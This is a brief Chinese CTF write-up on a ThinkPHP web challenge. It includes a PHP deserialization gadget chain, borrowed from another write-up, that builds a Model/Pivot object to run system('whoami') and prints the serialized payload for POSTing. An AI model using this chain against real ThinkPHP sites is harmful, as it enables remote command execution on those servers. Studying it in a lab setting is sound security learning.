打开在线环境可以看到：

记得之前做过一个类似的就是有点像照着漏洞去复现。应该可以直接在网上找到链子去打。
www.zip查看路由是 Index/test，然后 post 传参 a：

exp（参考了别的大神的wp）：

<?php
// 保证命名空间的一致
namespace think {// Model需要是抽象类abstract class Model {// 需要用到的关键字private $lazySave = false;private $data = [];private $exists = false;protected $table;private $withAttr = [];protected $json = [];protected $jsonAssoc = false;// 初始化public function __construct($obj='') {$this->lazySave = true;$this->data = ['whoami'=>['whoami']];$this->exists = true;$this->table = $obj;    // 触发__toString$this->withAttr = ['whoami'=>['system']];$this->json = ['whoami'];$this->jsonAssoc = true;}}
}namespace think\model {use think\Model;class Pivot extends Model {}// 实例化$p = new Pivot(new Pivot());echo urlencode(serialize($p));
}

我看的题解是在这一步之后就拿到了flag但是不知道为什么这边显示不出来flag（倒下）就这样吧。